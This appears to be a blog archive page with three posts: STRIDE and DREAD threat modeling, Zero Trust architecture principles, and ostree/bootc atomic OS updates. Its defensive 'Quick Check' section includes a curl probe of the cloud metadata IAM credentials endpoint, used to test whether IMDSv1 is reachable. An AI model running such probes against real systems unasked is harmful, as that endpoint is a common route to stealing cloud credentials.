Vamshi Krishna Santhapuri, Author at Linuxcent

STRIDE Threat Modeling: Proactive Security Design for Architects

July 7, 2026 by Vamshi Krishna Santhapuri

Reading Time: 6 minutes

Zero to Hero: Cybersecurity Architecture Masterclass, Module 2

11 min read

TL;DR

STRIDE threat modeling is a checklist for finding design-level vulnerabilities before code exists: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege
Run it against a data-flow diagram, not against code — every process, data store, and trust boundary gets checked against all six categories
DREAD risk scoring turns “this is a threat” into a number, so you can prioritize which findings become engineering tickets first
Trust boundaries — anywhere data crosses from one privilege level to another — are where most real threats concentrate
Free, code-based tools (pytm, OWASP Threat Dragon) let you version-control your threat model the same way you version-control infrastructure
STRIDE run once at design time catches classes of bugs that a penetration test only catches after the system already shipped

The Big Picture: STRIDE Threat Modeling in One Checklist

Every element in a system — a process, a data store, a data flow, an external entity — can fail in up to six ways. STRIDE threat modeling names them so you check for all six instead of whichever one happened to occur to you.

STRIDE THREAT MODEL — APPLIED PER SYSTEM ELEMENT
──────────────────────────────────────────────────────────────
 Threat Category          Security Property Violated
──────────────────────────────────────────────────────────────
 S  Spoofing               Authenticity   — are you who you say?
 T  Tampering              Integrity      — was this modified?
 R  Repudiation            Non-Repudiation— can this be denied?
 I  Information Disclosure Confidentiality— who else can read this?
 D  Denial of Service      Availability   — can this be starved?
 E  Elevation of Privilege Authorization  — can this reach more than it should?
──────────────────────────────────────────────────────────────
       ↑ maps directly onto the Extended CIA Triad from Module 1

STRIDE threat modeling is a systematic way to find design flaws before a single line of code exists, by checking every element of a system against these six failure modes instead of relying on whoever’s reviewing the design to think of them unprompted.

Why “Shift Left” Needs a Checklist, Not Good Intentions

Module 1 closed by naming the “Shift Left Myth” — teams that call a CI security scanner “shifting left” when the actual architecture was never reviewed at the design phase at all. A CI scan finds vulnerabilities in code that already exists. STRIDE finds the ones that don’t need code to exist yet, because they’re baked into the design: a service that trusts an internal network by IP address, a queue with no message-origin verification, an admin API reachable from the same trust zone as public traffic.

A team building a new internal billing service skips a design review — “it’s internal, it’s fine” — and ships it trusting any caller on the VPC. Eight months later, a compromised marketing-analytics pod (unrelated team, unrelated purpose, same VPC) calls the billing API directly and issues refunds. Nothing was “hacked” in the traditional sense. The design simply never asked: what happens if something on this network isn’t who we assumed?

That’s a Spoofing failure, and STRIDE would have surfaced it in an hour-long design review, months before the analytics pod existed.

Running STRIDE Against a Data-Flow Diagram

STRIDE is applied to a Data-Flow Diagram (DFD) — not to source code, and not to infrastructure diagrams showing subnets and security groups. A DFD has four element types, and each type is only vulnerable to a subset of STRIDE:

 Element Type        Vulnerable To
 ──────────────────  ─────────────────────────────────
 External Entity     Spoofing, Repudiation
 Process              Spoofing, Tampering, Repudiation,
                       Info Disclosure, DoS, Elevation
 Data Store           Tampering, Info Disclosure, DoS,
                       (Repudiation if no access logging)
 Data Flow            Tampering, Info Disclosure, DoS

Processes are checked against all six categories because they’re where identity, logic, and privilege all live. Data stores can’t “spoof” anything — but they can absolutely be read or written by someone who shouldn’t, or overwhelmed.
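The element-to-category table above can be encoded as a lookup, so each DFD element gets its full checklist generated rather than remembered. This is a minimal sketch: the `checklist` helper and the element names are illustrative assumptions, not part of any tool.

```python
from enum import Enum


class Stride(Enum):
    SPOOFING = "Spoofing"
    TAMPERING = "Tampering"
    REPUDIATION = "Repudiation"
    INFO_DISCLOSURE = "Information Disclosure"
    DENIAL_OF_SERVICE = "Denial of Service"
    ELEVATION = "Elevation of Privilege"


# Which categories apply to which DFD element type (from the table above).
APPLICABLE = {
    "external_entity": [Stride.SPOOFING, Stride.REPUDIATION],
    "process": list(Stride),
    "data_store": [Stride.TAMPERING, Stride.INFO_DISCLOSURE, Stride.DENIAL_OF_SERVICE],
    "data_flow": [Stride.TAMPERING, Stride.INFO_DISCLOSURE, Stride.DENIAL_OF_SERVICE],
}


def checklist(elements, stores_without_access_logs=()):
    """Yield (element name, category) pairs that a reviewer must answer."""
    for name, kind in elements:
        categories = list(APPLICABLE[kind])
        # A data store only picks up Repudiation when it lacks access logging.
        if kind == "data_store" and name in stores_without_access_logs:
            categories.append(Stride.REPUDIATION)
        for category in categories:
            yield name, category


# Hypothetical elements for the billing example.
elements = [
    ("Analytics pod", "external_entity"),
    ("Billing API", "process"),
    ("Billing DB", "data_store"),
    ("Query balance", "data_flow"),
]
questions = list(checklist(elements, stores_without_access_logs={"Billing DB"}))
for name, category in questions:
    print(f"{name}: {category.value}?")
```

Generating the questions does not answer them, but it makes a skipped category visible in review.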

Trust boundaries are drawn as dashed lines across the diagram anywhere a data flow crosses from one privilege or trust level to another: public internet → load balancer, application tier → database tier, one team’s service → another team’s service, on-prem → cloud. Every element sitting directly on a trust boundary gets checked first, because that’s structurally where real threats concentrate — an internal-only process that never sees a trust boundary is a much lower priority than an internet-facing one processing untrusted input.

The billing-service incident above is a trust-boundary failure by definition: the design never drew a boundary between “our service” and “anything else on the VPC,” so nothing on that (missing) boundary was ever checked.
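One way to see why the missing boundary mattered is to treat a trust boundary as a change of zone between a flow's source and sink. The sketch below is an assumption-laden illustration: the zone names, the `Flow` type, and `boundary_crossings` are hypothetical.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    source: str
    sink: str
    name: str


def boundary_crossings(zone_of, flows):
    """Return flows whose source and sink sit in different trust zones."""
    return [f for f in flows if zone_of[f.source] != zone_of[f.sink]]


flows = [
    Flow("Analytics pod", "Billing API", "Issue refund"),
    Flow("Billing API", "Billing DB", "Query balance"),
]

# Original design: everything shares one zone, so no flow is ever flagged.
flat = {"Analytics pod": "vpc", "Billing API": "vpc", "Billing DB": "vpc"}
# Revised design: billing gets its own zone, so the refund flow crosses a boundary.
segmented = {"Analytics pod": "vpc", "Billing API": "billing", "Billing DB": "billing"}

print(boundary_crossings(flat, flows))
print(boundary_crossings(segmented, flows))
```

With the flat zoning the review list is empty, which is the failure described above: nothing was checked because no boundary existed to check.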

Working the Six Categories

Spoofing — Can an entity convincingly pretend to be something it isn’t? Mitigations: mutual TLS, signed service tokens, SPIFFE/SPIRE identities instead of IP-based trust (Module 1’s Zero Trust principle, applied concretely).

Tampering — Can data be modified in transit or at rest without detection? Mitigations: TLS in transit, checksums/signatures on artifacts, database-level integrity constraints, immutable audit logs.

Repudiation — Can an actor perform an action and later credibly deny it? Mitigations: signed, centrally-shipped audit logs (CloudTrail, Kubernetes audit logs) that the actor cannot modify after the fact — this is why Module 1 called non-repudiation an architectural requirement, not a compliance checkbox.

Information Disclosure — Can data reach an entity that shouldn’t see it? Mitigations: encryption at rest and in transit, least-privilege IAM, field-level access control for sensitive data classes.

Denial of Service — Can an entity be starved of resources it needs to function? Mitigations: rate limiting, autoscaling with sane ceilings, circuit breakers, resource quotas per tenant.

Elevation of Privilege — Can an entity reach capabilities beyond what it was granted? Mitigations: strict RBAC, no ambient authority, explicit privilege boundaries between services. Two familiar patterns belong to this category: the iam:PassRole privilege-escalation path (covered in the IAM series) and a misconfigured S3 bucket that ends up escalating to admin access.

Scoring What You Find: DREAD

STRIDE tells you what kind of threat exists. It says nothing about how bad it is. A dozen findings with no prioritization is not actionable — DREAD converts each finding into a 0–10 score across five dimensions so engineering can triage like any other backlog:

 D  Damage Potential     — how bad is the worst case if exploited?
 R  Reproducibility      — how reliably can it be triggered?
 E  Exploitability       — how much skill/access does it require?
 A  Affected Users       — how much of the system/user base is exposed?
 D  Discoverability      — how easy is it to find unassisted?

 DREAD score = average of the five (0–10 scale)

The billing-service Spoofing finding above scores high on Damage (financial loss), high on Reproducibility (any pod on the VPC, repeatably), moderate on Exploitability (requires being on the VPC — not zero-effort, but not hard either), high on Affected Users (the entire billing system), and low-to-moderate on Discoverability (not obvious without VPC access, but not hidden either). That combination — high damage, high reproducibility — is exactly the profile that goes to the top of the backlog, above findings that are theoretically worse but require nation-state-level access to trigger.
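The averaging rule is simple enough to automate. In this sketch the numeric ratings are illustrative assumptions, because the text gives only qualitative levels, and the second finding is hypothetical.

```python
from dataclasses import dataclass, astuple


@dataclass(frozen=True)
class Dread:
    damage: int
    reproducibility: int
    exploitability: int
    affected_users: int
    discoverability: int

    def score(self) -> float:
        """Average of the five dimensions, each on a 0-10 scale."""
        values = astuple(self)
        if any(not 0 <= v <= 10 for v in values):
            raise ValueError("each DREAD dimension must be between 0 and 10")
        return sum(values) / len(values)


# Illustrative numbers only.
findings = {
    "Billing API trusts any VPC caller": Dread(9, 9, 6, 9, 4),
    "Hypothetical finding needing physical datacenter access": Dread(10, 2, 1, 9, 1),
}

# Highest score first, the order in which findings become tickets.
backlog = sorted(findings.items(), key=lambda item: item[1].score(), reverse=True)
for title, rating in backlog:
    print(f"{rating.score():.1f}  {title}")
```

The second finding has the higher damage rating but sorts lower, because it is hard to reproduce and exploit.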

Doing This as Code, Not a Whiteboard Session

A whiteboard threat model is useful for a workshop and useless six months later when the architecture has changed and nobody updates the photo. pytm lets you define the data-flow diagram and its trust boundaries in Python, and OWASP Threat Dragon stores its diagrams and threats as a JSON model file. Either way the model is a file you can review in a pull request, and with pytm you can regenerate the DFD and a findings report on every change.

# threatmodel.py (pytm)
from pytm import TM, Server, Datastore, Dataflow, Boundary

tm = TM("Billing Service")
internet = Boundary("Public Internet")
internal = Boundary("Internal VPC")

api = Server("Billing API")
api.inBoundary = internal
db = Datastore("Billing DB")
db.inBoundary = internal

# Data flow from the API to its database: Dataflow(source, sink, name)
query = Dataflow(api, db, "Query balance")
query.protocol = "PostgreSQL"
query.isEncrypted = True

tm.process()

# Generate the DFD, then write the findings as JSON
$ python3 threatmodel.py --dfd | dot -Tpng -o dfd.png
$ python3 threatmodel.py --json findings.json

# Findings are reported per element and data flow. An illustrative
# example (not verbatim pytm output) of the kind of issue to expect:
# [ELEVATION OF PRIVILEGE] Billing API -> Billing DB crosses no
# authentication boundary check; caller identity is not verified
# before query execution.

The model lives next to the code it describes, diffs like any other file, and a reviewer sees exactly what trust boundary changed when a new dependency gets added — instead of discovering it in production eight months later.

Production Gotchas

A threat model with no owner goes stale in one sprint. Assign the DFD file the same ownership as the service’s Terraform or Helm chart — whoever changes the architecture updates the model in the same PR.

STRIDE without trust boundaries drawn is just a vocabulary exercise. Teams sometimes run through all six letters against a whole system at once with no boundaries marked, producing a vague list nobody acts on. Draw the boundaries first; findings should cluster around them.

DREAD scores drift toward “everything is a 7” without calibration. Anchor each dimension with 2–3 concrete example findings from your own systems before scoring new ones, or every finding regresses to the mean and the prioritization signal disappears.

A code-based threat model is not a substitute for a design review conversation. pytm output is a starting point for discussion between the architect and the team, not a report to file away unread.

Framework Alignment

Framework	Control / ID	Architectural Mapping
NIST CSF 2.0	ID.RA-01	Asset vulnerabilities are identified and documented — threat modeling is the design-phase mechanism for this.
NIST SP 800-207	Zero Trust	Trust boundary analysis is the direct architectural expression of “never trust, always verify.”
ISO 27001:2022	8.25	Secure development life cycle — threat modeling required at the design phase, not just pre-release testing.
SOC 2	CC3.4	The entity identifies and assesses changes that could significantly impact the system of internal control.

Key Takeaways

STRIDE checks every system element against six named failure modes so nothing gets skipped because no one thought of it
Run it against a data-flow diagram with trust boundaries explicitly drawn — findings cluster where boundaries are
DREAD turns qualitative findings into a prioritized, comparable backlog
Code-based threat modeling (pytm, Threat Dragon) keeps the model current instead of a stale whiteboard photo
A threat model needs an owner tied to the architecture it describes, or it goes stale in one sprint

What’s Next

Module 2 gave you the process for finding design flaws before code exists. Module 3 takes one specific, high-stakes trust boundary — the AWS identity perimeter — and shows exactly how IMDSv2, IAM policy design, and infrastructure-as-code scanning close the Elevation of Privilege and Spoofing findings that STRIDE surfaces most often in cloud-native systems.

Next: Module 3: Cloud-Native Hardening — Securing the AWS Identity Perimeter


Cybersecurity Architecture Principles: Beyond the Castle-and-Moat

July 7, 2026 by Vamshi Krishna Santhapuri

Reading Time: 6 minutes

Zero to Hero: Cybersecurity Architecture Masterclass, Module 1

12 min read

Introduction

Modern cybersecurity architecture principles trace back to a single admission: in 2014, Google published the “BeyondCorp” whitepaper, the first high-profile confession from a tech giant that the corporate network (the “internal” network everyone trusted by default) was no longer safe. For decades, security was built on the Castle-and-Moat model: a hardened perimeter (the firewall) protecting a soft, trusted interior.

If you were inside the moat, you were trusted. If you were outside, you were a threat.

The rise of cloud, mobile, and sophisticated lateral-movement attacks has rendered this model obsolete. If an attacker compromises a single developer’s laptop or a single vulnerable Jenkins server, they are “inside the castle.” In a legacy architecture, the game is over.

Module 1 of the Masterclass establishes the core cybersecurity architecture principles required to move beyond the perimeter. We redefine the CIA Triad for the cloud era and establish the foundational shift to Zero Trust.

TL;DR

The CIA Triad is no longer enough: Modern architecture requires the Extended CIA Triad, adding Authenticity and Non-Repudiation to Confidentiality, Integrity, and Availability.
Defense-in-Depth is about redundant layers: A single failure (e.g., a leaked IAM key) should not lead to a total breach.
Zero Trust rejects implicit trust: No network location is trusted. Every request is verified explicitly based on identity, device posture, and context.
Security is a Product Requirement: Architectural security must be integrated into the SDLC (Software Development Lifecycle) from the “Definition” phase, not bolted on at “Deployment.”

The Big Picture: From Castle-and-Moat to Zero Trust

The fundamental shift in architecture is the transition from Network-Centric Trust to Identity-Centric Trust.

┌─────────────────────────────────────────────────────────────────────────────┐
│                   THE ARCHITECTURAL SHIFT: PERIMETER TO IDENTITY            │
├─────────────────────────────────────────────────────────────────────────────┤
│                                                                             │
│  LEGACY: CASTLE-AND-MOAT                  MODERN: ZERO TRUST ARCHITECTURE   │
│  (Implicit Trust)                         (Explicit Verification)           │
│                                                                             │
│  [ External ]                             [ External ]                      │
│       │                                        │                            │
│  ┌────▼────┐                              ┌────▼────────┐                   │
│  │ FIREWALL│ (The Moat)                   │ IDENTITY    │                   │
│  └────┬────┘                              │ PROVIDER    │                   │
│       │                                   └────┬────────┘                   │
│  ┌────▼──────────────┐                         │                            │
│  │ TRUSTED INTERIOR  │                    ┌────▼────────┐                   │
│  │ (soft center)     │                    │ POLICY      │                   │
│  │ [App] [DB] [Log]  │                    │ ENGINE      │                   │
│  └───────────────────┘                    └────┬────────┘                   │
│                                                │ (Always Verify)            │
│       FAILURE MODE:                       ┌────▼────────┐                   │
│       Compromised VPN =                   │ RESOURCE    │                   │
│       Full Access                         │ [App] [DB]  │                   │
│                                           └─────────────┘                   │
│                                                                             │
└─────────────────────────────────────────────────────────────────────────────┘

1. The Extended CIA Triad Deep-Dive

Every security decision you make as an architect eventually maps back to the CIA Triad. But for modern systems, the “Classic CIA” (Confidentiality, Integrity, Availability) is missing the two pillars that handle identity and accountability.

Confidentiality (Protecting the Data)

At Rest: AES-256 encryption for S3 buckets or RDS instances.
In Transit: TLS 1.3 for every internal and external API call.
In Execution: Using Trusted Execution Environments (TEEs) or eBPF-based visibility to ensure memory isn’t being scraped.

Integrity (Trusting the Data)

Hashing: Using SHA-256/512 to verify that the container image you pulled is the exact one you built.
Digital Signatures: Signing your CI/CD artifacts so the production cluster only runs code signed by your build system.
FIM (File Integrity Monitoring): Detecting when a binary in /usr/bin is modified on a live node.
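The hashing check reduces to comparing a freshly computed digest with the one recorded at build time. A minimal sketch, assuming the artifact is available as bytes; the helper names and sample data are illustrative.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def matches_digest(data: bytes, expected_hex: str) -> bool:
    """True only if the data hashes to the digest recorded at build time."""
    # compare_digest avoids leaking where the mismatch occurs via timing.
    return hmac.compare_digest(sha256_hex(data), expected_hex.lower())


# Stand-in bytes for an artifact; a real check would read the pulled file or layer.
built = b"example artifact contents"
recorded_digest = sha256_hex(built)  # stored by the build system

print(matches_digest(built, recorded_digest))
print(matches_digest(built + b"!", recorded_digest))
```

A digest only proves the bytes are unchanged. Proving who produced them is the job of the signature step listed above.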

Availability (Ensuring Access)

Resilience: Multi-AZ deployments and automated failover.
Protection: AWS Shield or Cloudflare to absorb L3/L4 and L7 DDoS attacks.
Immutable Backups: Protecting data from ransomware using WORM (Write Once, Read Many) storage.

Authenticity & Non-Repudiation (The “Extended” Pillars)

Authenticity: Proving the caller is who they say they are (MFA, Client Certificates).
Non-Repudiation: Ensuring an action cannot be denied later. This is where Secure Audit Logs (CloudTrail, Kubernetes Audit) become architectural requirements, not just compliance checkboxes.
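One building block behind audit logs that cannot be quietly rewritten is a hash chain, where each entry's hash covers the previous entry. The sketch below is a simplified illustration, not how CloudTrail or Kubernetes implement it. It gives tamper evidence only, so full non-repudiation would also need entries signed with a key the actor does not control.

```python
import hashlib
import json

GENESIS = "0" * 64


def _entry_hash(prev_hash: str, record: dict) -> str:
    payload = json.dumps(record, sort_keys=True).encode()
    return hashlib.sha256(prev_hash.encode() + payload).hexdigest()


def append(log: list, record: dict) -> None:
    """Append a record whose hash covers the previous entry's hash."""
    prev_hash = log[-1]["hash"] if log else GENESIS
    log.append({"record": record, "hash": _entry_hash(prev_hash, record)})


def verify(log: list) -> bool:
    """Recompute the chain; an edited or mid-chain removed entry breaks it.

    Truncating the end of the log is NOT detected without an external anchor.
    """
    prev_hash = GENESIS
    for entry in log:
        if entry["hash"] != _entry_hash(prev_hash, entry["record"]):
            return False
        prev_hash = entry["hash"]
    return True


log = []
append(log, {"actor": "alice", "action": "DeleteBucket"})
append(log, {"actor": "bob", "action": "CreateUser"})
print(verify(log))

log[0]["record"]["actor"] = "mallory"  # attempt to rewrite history
print(verify(log))
```

Shipping the latest hash to a system the actor cannot write to is what turns this from a local check into an architectural control.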

2. Core Architecture Principles: Defense-in-Depth

Defense-in-Depth is often misunderstood as “buying more tools.” In architecture, it means Functional Redundancy of Controls.

Think of it as a series of checks where no single check is the “God Gate.”

Policy Layer: SCPs (Service Control Policies) that disable entire AWS regions.
Perimeter Layer: WAF rules blocking SQL injection at the edge.
Identity Layer: MFA required for every console and CLI session.
Network Layer: Security Groups and Micro-segmentation (Cilium/Istio).
Endpoint Layer: EDR (CrowdStrike/Tetragon) monitoring for anomalous process execution.
Data Layer: Encryption with KMS keys that the application role must explicitly be granted access to.

Practitioner Depth: A classic failure is relying on a VPN for access control. If the VPN is breached, the “Depth” is revealed to be zero. A true Defense-in-Depth architecture assumes the VPN is breached and relies on the subsequent layers (Identity and Data encryption) to stop the attacker.

3. Dismantling the Castle-and-Moat (Zero Trust)

Figure: The architectural shift from perimeter to identity. Left: castle-and-moat, where one firewall decision grants access to the whole trusted interior. Right: zero trust, where every request is verified against identity, policy, and context before reaching an isolated resource.

Zero Trust is the architectural implementation of the principle: “Never Trust, Always Verify.”

The Three Pillars of ZTA (Distilled from NIST SP 800-207)

Continuous Verification: You don’t just verify at login. You verify every single request.
Limit Blast Radius (Micro-segmentation): If a web server is compromised, it should have no network path to the database except on the specific port required for the application.
Automate Context-Aware Response: If a user logs in from a new country and immediately tries to delete an S3 bucket, the architecture should automatically step up to MFA or revoke the session.

Zero Trust for IAM: We covered this extensively in IAM Episode 12. In architecture, this means moving the “Trust Boundary” from the edge of the VPC to the edge of the individual service or container.
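The per-request evaluation described by the three pillars can be sketched as a small policy function. Every name below (`Request`, `decide`, the sensitive-action set, the country codes) is a hypothetical illustration, and a real policy engine would weigh far more signals.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Request:
    identity_verified: bool   # e.g. a valid mTLS certificate or signed token
    device_compliant: bool    # device posture check passed
    country: str
    action: str


SENSITIVE_ACTIONS = {"s3:DeleteBucket"}  # hypothetical policy content


def decide(request: Request, usual_countries: set) -> str:
    """Evaluate one request; nothing is inferred from network location."""
    if not request.identity_verified or not request.device_compliant:
        return "deny"
    unusual_context = request.country not in usual_countries
    if unusual_context and request.action in SENSITIVE_ACTIONS:
        return "step_up_mfa"
    return "allow"


usual = {"DE"}
print(decide(Request(True, True, "DE", "s3:GetObject"), usual))
print(decide(Request(True, True, "BR", "s3:DeleteBucket"), usual))
print(decide(Request(False, True, "DE", "s3:GetObject"), usual))
```

The function runs on every request rather than once at login, which is the difference between continuous verification and a session that stays trusted after a single check.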

4. Integration with the Software Lifecycle (SDLC)

Security architecture that exists only on a whiteboard is a liability. It must be integrated into the product management and development workflow.

The “Shift Left” Myth

Many teams talk about “shifting left” (moving security earlier in the cycle) but only implement it as a “pre-commit hook” or a “CI scan.”

True Shift Left is Architectural:
– Module 2 of this series covers Threat Modeling. This happens during the Design phase, before code exists.
– Module 3 covers Hardening. This happens during the Infrastructure-as-Code phase.

If you are catching architectural flaws during a “Penetration Test” (Shift Right), you have already failed Module 1.

Quick Check: Is Your Architecture “Leaky”?

Run these three checks on your environment to see if you are still relying on implicit trust:

# 1. Check for wide-open S3 buckets (Network-level trust check)
aws s3api get-public-access-block --bucket <your-bucket>
# Success: BlockPublicAcls, IgnorePublicAcls, BlockPublicPolicy, and RestrictPublicBuckets should all be true.

# 2. Check if your nodes can reach the IMDSv1 endpoint (Metadata spoofing check)
# Run this from INSIDE a pod:
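curl -s --max-time 5 -o /dev/null -w '%{http_code}\n' http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Success: 401 if IMDSv2 is enforced (Module 3), or a timeout if pods cannot reach the endpoint at all. A 200 means IMDSv1 still works.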

# 3. Check for "God Roles" in your K8s cluster
kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name=="cluster-admin")'
# Success: Only the built-in cluster-admin binding (group system:masters) and your cluster management tool (e.g., ArgoCD) should be listed.

Production Gotchas

Latency vs. Security: Deep Packet Inspection (DPI) in a WAF or a Service Mesh (Istio) adds latency. You must architect for this by using Fast-Path hooks like XDP (covered in eBPF Episode 07) where possible.
The “Admin” Trap: Most breaches don’t happen because of a complex exploit; they happen because an administrator turned off MFA to “debug” a problem and never turned it back on. Architecture must enforce Non-Bypassable Controls.
Audit Logs are a DDoS Vector: If you log every packet at the kernel level without sampling, you will crash your logging pipeline before the attacker even finishes their scan.

Framework Alignment

Framework	Control / ID	Architectural Mapping
NIST CSF 2.0	GV.PO-01	Establish cybersecurity policy integrated with organizational SDLC.
NIST SP 800-207	Zero Trust	No implicit trust; identity-based access; continuous verification.
ISO 27001:2022	5.15	Access control must be based on business and security requirements.
SOC 2	CC6.1	Logical access controls must restrict access to authorized users/processes.

Key Takeaways

The Perimeter is a myth: Assume the attacker is already in your network.
Extended CIA: Authenticity and Non-Repudiation are the modern requirements for identity-based architecture.
Defense-in-Depth: Functional redundancy means no single control failure leads to a total breach.
Zero Trust: Move the trust boundary to the resource level, not the network level.

What’s Next

Foundational models are the “Why.” Module 2 covers the “How”—specifically, how to systematically identify threats using the STRIDE framework and calculate risk using DREAD.

Threat modeling is the single most important skill for a Security Architect. It’s how you stop vulnerabilities before they are even typed into an IDE.

Next: Module 2: Proactive Design — Threat Modeling with STRIDE


Atomic OS Updates Explained: How ostree and bootc Actually Work

July 7, 2026 by Vamshi Krishna Santhapuri

Reading Time: 7 minutes

Immutable OS Series, Episode 2

TL;DR

Atomic OS updates at the mechanism level: ostree stores every deployment as a content-addressed commit, not a set of files you overwrite, so “atomic” is a property of the filesystem layout, not a promise a script makes
The actual atomicity boundary is a single bootloader configuration write — everything before that point is fully reversible, and everything after it is a clean boot into a complete, self-contained deployment
bootc builds on the same ostree deployment model but starts from a Containerfile, so building a bootable OS image uses the same toolchain as building an application container
Power loss mid-update is a non-event: the system reboots into whatever the bootloader pointed at before the write, because the new deployment was never referenced until that one atomic write succeeded
Rollback targets aren’t kept forever — garbage collection and configurable deployment limits mean “you can always roll back” has a real, finite window
This is the mechanism EP01 described in outline; this episode is what actually happens on disk

The Big Picture: A Commit Graph, Not a File Tree

ostree REPOSITORY (content-addressed objects)
─────────────────────────────────────────────
  commit A (hash 8f2a1c...)  ──parent──▶  commit B (hash 3b7e9d...)
       │                                        │
       │ checked out as                         │ checked out as
       ▼                                        ▼
  /ostree/deploy/os/deploy/8f2a1c...    /ostree/deploy/os/deploy/3b7e9d...
  (READ-ONLY bind mount → /)            (READ-ONLY bind mount → /, once active)

BOOTLOADER CONFIG (the atomicity boundary)
─────────────────────────────────────────────
  grub.cfg / loader entries
       │
       └── points to exactly ONE deployment directory at a time
           Changing this pointer IS the update. Nothing else has
           to happen for the new deployment to become "the OS."

The short version: ostree never edits a running deployment’s files. It writes an entirely new, complete deployment as a set of immutable, content-addressed objects somewhere else on disk, and the update becomes real the instant a single bootloader entry is rewritten to point at it. EP01 showed this from the outside: rpm-ostree status, rollback, a clean before/after. This episode is what’s actually happening underneath those commands.

Every Deployment Is a Commit, Not a Directory You Edited

A traditional package manager mutates the live system in place: apt upgrade replaces /usr/bin/curl with a new binary, one file at a time, on the same live filesystem the kernel and every running process are using. Each individual file swap may be safe, but the upgrade as a whole is not a single transaction. If it is interrupted, or if two updates race, the result is whatever mix of old and new files existed when things stopped. There’s no defined “before” state to return to, because the before state was destroyed in place.

ostree does something structurally different: every file in a deployment is stored as an object named by the SHA-256 hash of its content, inside a repository (/ostree/repo). A deployment is a commit: a tree of these hashed objects, checksummed all the way up, the same content-addressing model Git uses for a repository’s history. This is the same declarative-artifact idea Stratum’s HardeningBlueprint YAML applies to OS hardening (the artifact either fully exists or the build failed, with nothing skippable in between), extended down to the filesystem itself.

Deploying an update means:

1. Pull or build the new commit into the local ostree repository (pure object storage; this doesn’t touch the running system at all)
2. Check out that commit into a new deployment directory (/ostree/deploy/<os>/deploy/<checksum>); this still doesn’t touch the running system
3. Write a new bootloader entry pointing at that new deployment directory
4. Reboot

Steps 1 and 2 can take minutes, involve gigabytes of I/O, and fail halfway through with zero consequence — the running system’s deployment directory was never opened for writing. There is no partial-update state visible to anything, because nothing that’s currently running was ever touched.
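The content-addressing idea behind steps 1 and 2 can be shown with a toy object store. This is a deliberately simplified sketch: real ostree objects also cover file metadata and directory trees, and the `ObjectStore` class here is hypothetical.

```python
import hashlib


class ObjectStore:
    """Toy content-addressed store: the key is the SHA-256 of the content."""

    def __init__(self):
        self.objects = {}

    def put(self, content: bytes) -> str:
        digest = hashlib.sha256(content).hexdigest()
        self.objects.setdefault(digest, content)  # identical content is stored once
        return digest

    def commit(self, tree: dict) -> dict:
        """Map each path to the digest of its content."""
        return {path: self.put(content) for path, content in tree.items()}


store = ObjectStore()
commit_a = store.commit({"/usr/bin/curl": b"curl v1", "/usr/bin/ls": b"ls v1"})
commit_b = store.commit({"/usr/bin/curl": b"curl v2", "/usr/bin/ls": b"ls v1"})

# Building commit B only added objects; nothing commit A refers to was modified.
print(len(store.objects))
print(commit_a["/usr/bin/ls"] == commit_b["/usr/bin/ls"])
```

Because new content always lands under a new key, building the second commit cannot disturb the first, which is why a failed pull or checkout leaves the running deployment untouched.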

The Atomicity Boundary: One Bootloader Write

“Atomic” specifically refers to step 3. Rewriting a bootloader entry (a GRUB grub.cfg regeneration, or a systemd-boot loader entry file) is small enough to be a single filesystem operation: either the new entry exists on disk, or it doesn’t. There’s no meaningful “half-written bootloader entry” state that a power failure can leave you in. At boot, the bootloader reads whatever configuration fully exists, and that configuration selects exactly one deployment to boot by default.

POWER LOSS DURING STEP 1 or 2 (pulling/staging the new commit)
────────────────────────────────────────────────────────────
Next boot: bootloader entry still points at the OLD deployment.
The new commit's partial objects sit in the repo, orphaned,
inert. System boots exactly as if the update never started.

POWER LOSS DURING STEP 3 (bootloader entry write)
────────────────────────────────────────────────────────────
Filesystem-level atomic rename guarantees the entry write itself
either completes or doesn't. Next boot: either the old deployment
(write didn't land) or the new one (write landed) — never a
corrupted bootloader config caught in between.

POWER LOSS AFTER STEP 3, BEFORE REBOOT
────────────────────────────────────────────────────────────
Doesn't matter — the running system hasn't changed. The new
deployment activates on the NEXT boot, whenever that happens.

This is the property EP01 called “the system is never caught half-updated” — and now you can see exactly why: every step before the bootloader write is invisible to the running system, and the bootloader write itself is small enough that the filesystem’s own atomic-rename guarantee covers it. There’s no custom transaction logic to trust. It’s a property of doing the update in the right order, using a write that was already atomic.
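The write-then-rename pattern the atomicity argument relies on can be shown in a few lines. This sketch uses a plain pointer file in a temporary directory, with hypothetical file and deployment names. It shows the general technique, not ostree's actual bootloader handling.

```python
import os
import tempfile


def point_at(pointer_path: str, deployment: str) -> None:
    """Replace the pointer file so readers see the old or new value, never a mix."""
    directory = os.path.dirname(pointer_path) or "."
    fd, tmp_path = tempfile.mkstemp(dir=directory)
    try:
        with os.fdopen(fd, "w") as tmp:
            tmp.write(deployment + "\n")
            tmp.flush()
            os.fsync(tmp.fileno())  # data is on disk before it becomes visible
        os.replace(tmp_path, pointer_path)  # atomic rename on POSIX filesystems
    except BaseException:
        if os.path.exists(tmp_path):
            os.unlink(tmp_path)
        raise


def current(pointer_path: str) -> str:
    with open(pointer_path) as f:
        return f.read().strip()


with tempfile.TemporaryDirectory() as boot:
    pointer = os.path.join(boot, "current-deployment")  # hypothetical file name
    point_at(pointer, "deploy/8f2a1c")
    point_at(pointer, "deploy/3b7e9d")
    result = current(pointer)
    print(result)
```

All the slow work happens on the temporary file. The only step that changes what a reader sees is the rename, mirroring how staging the deployment is separate from activating it.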

bootc: The Same Model, a Container Build Toolchain

bootc uses this identical deployment mechanism — the on-disk layout, the bootloader swap, the rollback behavior are all the same ostree machinery. What bootc changes is how the commit gets built in the first place.

# Containerfile — this IS the OS image definition
FROM quay.io/fedora/fedora-bootc:41

RUN dnf install -y nginx && \
    systemctl enable nginx && \
    dnf clean all

# Standard container build — no special OS-image tooling required

# Build it exactly like an application container
$ podman build -t myregistry.example.com/os/web-node:v12 .
$ podman push myregistry.example.com/os/web-node:v12

# On the target machine — pulls the image, converts it to an
# ostree commit, stages it as the next deployment
$ bootc switch myregistry.example.com/os/web-node:v12
Queued for next boot: myregistry.example.com/os/web-node:v12
Please reboot to complete the update.

$ systemctl reboot

